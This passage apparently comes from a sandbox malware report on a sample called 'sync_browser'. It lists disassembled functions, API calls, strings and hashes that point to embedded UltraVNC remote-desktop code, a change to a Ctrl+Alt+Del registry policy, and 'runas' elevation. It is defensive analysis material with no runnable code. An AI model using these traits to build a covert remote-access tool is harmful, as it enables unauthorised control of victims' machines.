                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close$CreateOpenValue
                                                                                          • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                                          • API String ID: 678895439-3579764778
                                                                                          • Opcode ID: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
                                                                                          • Instruction ID: 931e0b3a536fe6af851cb7a6f1c3580f31b7d672ad4c022ae827d0964d2e024d
                                                                                          • Opcode Fuzzy Hash: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
                                                                                          • Instruction Fuzzy Hash: 9C111F72A28B4286EB508F25F84865AB7A4FB94798F501131F78D87B68EF3CD149CF00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close$CreateDeleteOpenValue
                                                                                          • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                                          • API String ID: 2881815620-3579764778
                                                                                          • Opcode ID: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
                                                                                          • Instruction ID: e171e1084ef3f34e9181a27492a7dc71b45baeec213dcca2f321c49bf68efa14
                                                                                          • Opcode Fuzzy Hash: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
                                                                                          • Instruction Fuzzy Hash: 35011233E28B4282EB508B25F84556AB7A4FB94794F501131F68D87A64DF3CD159CB00
                                                                                          APIs
                                                                                          • _lock.LIBCMT ref: 00007FF67E87AD95
                                                                                            • Part of subcall function 00007FF67E8877D0: _amsg_exit.LIBCMT ref: 00007FF67E8877FA
                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF67E87AF59,?,?,00000000,00007FF67E8877FF), ref: 00007FF67E87ADC8
                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF67E87AF59,?,?,00000000,00007FF67E8877FF), ref: 00007FF67E87ADE6
                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF67E87AF59,?,?,00000000,00007FF67E8877FF), ref: 00007FF67E87AE26
                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF67E87AF59,?,?,00000000,00007FF67E8877FF), ref: 00007FF67E87AE40
                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF67E87AF59,?,?,00000000,00007FF67E8877FF), ref: 00007FF67E87AE50
                                                                                          • _initterm.LIBCMT ref: 00007FF67E87AE90
                                                                                          • _initterm.LIBCMT ref: 00007FF67E87AEA3
                                                                                          • ExitProcess.KERNEL32 ref: 00007FF67E87AEDC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
                                                                                          • String ID:
                                                                                          • API String ID: 3873167975-0
                                                                                          • Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                                          • Instruction ID: 3f3f0044405978c82d9321e19ad044c64d1396d807b062a0351ae377c20921d6
                                                                                          • Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                                          • Instruction Fuzzy Hash: A8416D23A3DA4282E6509B55F840139B2A5BFA8BC4F140475F98DCBBA5EF3CE45CC700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 2819658684-0
                                                                                          • Opcode ID: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
                                                                                          • Instruction ID: 695c0bf299ef26faa5b3998d12adaeba3e9e21563c282567da85055fa38ec379
                                                                                          • Opcode Fuzzy Hash: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
                                                                                          • Instruction Fuzzy Hash: 0F31AF37A3875288EA609F92940016CF255BF66BA0F584632FE5C837D6DF3CE418C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$CloseInputOpen
                                                                                          • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                                          • API String ID: 1367241101-3977938048
                                                                                          • Opcode ID: f6cdd6782624a4e5c6a8136b039a067c6538edc3eea74ebc030ec03bf903a74b
                                                                                          • Instruction ID: b1b3e684ea3df7a0e3590b20af68316a1d5310d234f442cd998540c13b0b193d
                                                                                          • Opcode Fuzzy Hash: f6cdd6782624a4e5c6a8136b039a067c6538edc3eea74ebc030ec03bf903a74b
                                                                                          • Instruction Fuzzy Hash: 60C1C223A28AC185FB50CB25C4597FE6BA5EBA5B84F194131EA4C8B7E5DF3CE449C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$CloseInputOpen
                                                                                          • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                                          • API String ID: 1367241101-3977938048
                                                                                          • Opcode ID: 47211445917a2fe33d9bd0dd538afe367969b15db1aee06732e003ef7b4f3ddc
                                                                                          • Instruction ID: b721cf953081675ede7d3e1d19cd46a17afbe1699a64155e137dd9acceb44560
                                                                                          • Opcode Fuzzy Hash: 47211445917a2fe33d9bd0dd538afe367969b15db1aee06732e003ef7b4f3ddc
                                                                                          • Instruction Fuzzy Hash: D4B1D423A18AC185FB50CB25C4497FE6BA5EBA5B44F194131EA4C8B7A5DF3CE449C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
                                                                                          • String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
                                                                                          • API String ID: 3897446562-3886131270
                                                                                          • Opcode ID: a5e006efe04d664e07b53d64243aa38d9558d9fe088fd9a2bf60d0eb440ea4a3
                                                                                          • Instruction ID: 196f7eccf1eec18f49e6a9c637eaaeff1bdace99091547ecbc506d0fa1508e5c
                                                                                          • Opcode Fuzzy Hash: a5e006efe04d664e07b53d64243aa38d9558d9fe088fd9a2bf60d0eb440ea4a3
                                                                                          • Instruction Fuzzy Hash: A8817C22628B8699EB20CB74D8003ED7760FB557A4F504332EABD97AD9DF6CD50AC700
                                                                                          APIs
                                                                                          • GetDeviceCaps.GDI32 ref: 00007FF67E7F0113
                                                                                          • GetDeviceCaps.GDI32 ref: 00007FF67E7F0140
                                                                                          • GetDeviceCaps.GDI32 ref: 00007FF67E7F016D
                                                                                            • Part of subcall function 00007FF67E7CA040: OpenInputDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA07A
                                                                                            • Part of subcall function 00007FF67E7CA040: GetCurrentThreadId.KERNEL32 ref: 00007FF67E7CA083
                                                                                            • Part of subcall function 00007FF67E7CA040: GetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA08B
                                                                                            • Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0A6
                                                                                            • Part of subcall function 00007FF67E7CA040: MessageBoxA.USER32 ref: 00007FF67E7CA0B7
                                                                                            • Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0C2
                                                                                            • Part of subcall function 00007FF67E7CA040: CloseDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$Thread$CapsDevice$CloseCurrentInputMessageOpen
                                                                                          • String ID: WinVNC$vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver$vncdesktop.cpp : DBG:display context has %d planes!$vncdesktop.cpp : DBG:memory context has %d planes!
                                                                                          • API String ID: 3271485511-23260621
                                                                                          • Opcode ID: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                                          • Instruction ID: 92afe53d98426e1af4aedc0e195606612a7900b4a4f0b1fb04080f7d4c34d131
                                                                                          • Opcode Fuzzy Hash: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                                          • Instruction Fuzzy Hash: 01217E776285C685E7048FB5D4107E82765EB68B09F480437EE8CDB799DE7CD18AC720
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Thread$Desktop$CurrentInformationObjectUser
                                                                                          • String ID: vncservice.cpp : !GetUserObjectInformation $vncservice.cpp : SelectHDESK to %s (%x) from %x$vncservice.cpp : SelectHDESK:!SetThreadDesktop
                                                                                          • API String ID: 3041254040-2700308907
                                                                                          • Opcode ID: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
                                                                                          • Instruction ID: 82a63720b25a5f2363b0fcb314456569050b1bddfa33d7842301f3cfe1711685
                                                                                          • Opcode Fuzzy Hash: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
                                                                                          • Instruction Fuzzy Hash: 95213036E2CA8281EB60DB55B9083FAA3A9FFB8754F540132E54E8A654DE3CE04DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                                                          • String ID: -softwarecad$p$runas
                                                                                          • API String ID: 397093096-2208381721
                                                                                          • Opcode ID: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                                          • Instruction ID: c242861539071678ad9d9f26406b8e064d9ed2b65196c209ee7d2094103b19c7
                                                                                          • Opcode Fuzzy Hash: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                                          • Instruction Fuzzy Hash: 1C11CC36A28B8195E7709F54F49939AB3A4FB98745F400235E68D42BA8DF7CD158CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                                                          • String ID: -delsoftwarecad$p$runas
                                                                                          • API String ID: 397093096-3343046257
                                                                                          • Opcode ID: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                                                          • Instruction ID: ab7036e1348f19cbfefdda6a4b56e2e236990cefaa816dbc90a11b4cbb727417
                                                                                          • Opcode Fuzzy Hash: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                                                          • Instruction Fuzzy Hash: 2111CC36928B8195E7709F54F49939AB3A4FB98745F400235E68D42BA8DF7CD158CB40
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleValueWait
                                                                                          • String ID:
                                                                                          • API String ID: 3883107862-0
                                                                                          • Opcode ID: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
                                                                                          • Instruction ID: 878c7b5c70131846f5800fd9ff31bc638a2287b61e8ec8f26e84d93395a34aa6
                                                                                          • Opcode Fuzzy Hash: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
                                                                                          • Instruction Fuzzy Hash: 53312D37A28B4696EB109F24E4443ADB3A4FBA8B94F444135EA8E87765CF3CD59DC700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
